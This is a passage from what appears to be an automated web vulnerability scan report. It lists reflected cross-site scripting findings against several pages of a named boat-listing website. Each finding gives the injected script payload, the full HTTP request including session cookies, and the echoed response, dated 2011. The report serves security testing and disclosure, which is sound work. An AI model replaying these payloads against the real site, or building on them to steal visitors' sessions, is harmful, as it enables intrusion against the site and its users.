ay_photo.jsp?&hosturl=donnellyyachts&&ywo=donnellyyachts&slim=broker&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url=8f3bf\\';alert(1)//8b42d24e13f\'>
...[SNIP]...

3.473. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da30f'><script>alert(1)</script>9724fd50dc was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=da30f'><script>alert(1)</script>9724fd50dc&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:44 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 29533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
ay_photo.jsp?&hosturl=donnellyyachts&&ywo=donnellyyachts&slim=broker&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url=da30f'><script>alert(1)</script>9724fd50dc'>
...[SNIP]...

3.474. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the &hosturl request parameter is copied into the HTML document as plain text between tags. The payload 35cc2<script>alert(1)</script>9b144cda554 was submitted in the &hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_display_photo.jsp?&hosturl=starlingmarine35cc2<script>alert(1)</script>9b144cda554&&ywo=starlingmarine&slim=broker&boat_id=2047906&boatname=23%27+Contender+&photo_revised_date=1237828294000&photo_name=Photo+1&photo=1&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:28:43 GMT
Server: Apache
Cache-Control: private
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine35cc2<script>alert(1)</script>9b144cda554/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine35cc2<script>
...[SNIP]...

3.475. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [&hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the &hosturl request parameter is copied into an HTML comment. The payload ead6a--><script>alert(1)</script>066e841e956 was submitted in the &hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/pl_display_photo.jsp?&hosturl=starlingmarineead6a--><script>alert(1)</script>066e841e956&&ywo=starlingmarine&slim=broker&boat_id=2047906&boatname=23%27+Contender+&photo_revised_date=1237828294000&photo_name=Photo+1&photo=1&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:28:52 GMT
Server: Apache
Cache-Control: private
Content-Length: 1141
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<script>alert(1)</script>066e841e956/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarineead6a-->
...[SNIP]...

3.476. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [Regulator+32+FS&photo_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the Regulator+32+FS&photo_name request parameter is copied into the HTML document as plain text between tags. The payload d5bd6<script>alert(1)</script>58242dc8c82 was submitted in the Regulator+32+FS&photo_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_display_photo.jsp?slim=broker&&photo=30&boat_id=1787065&boatname=&hosturl=donnellyyachts&Regulator+32+FS&photo_name=Photo+11d5bd6<script>alert(1)</script>58242dc8c82 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:31:22 GMT
Server: Apache
Cache-Control: private
Content-Length: 10319
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts/boats.footer.html
...[SNIP]...
</h1>
Photo 11d5bd6<script>alert(1)</script>58242dc8c82
<p align="center">
...[SNIP]...

3.477. http://www.yachtworld.com/core/listing/pl_display_photo.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_display_photo.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1848e'%3balert(1)//d11de79295f was submitted in the boat_id parameter. This input was echoed as 1848e';alert(1)//d11de79295f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker&boat_id=20479061848e'%3balert(1)//d11de79295f&boatname=23%27+Contender+&photo_revised_date=1237828294000&photo_name=Photo+1&photo=1&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+W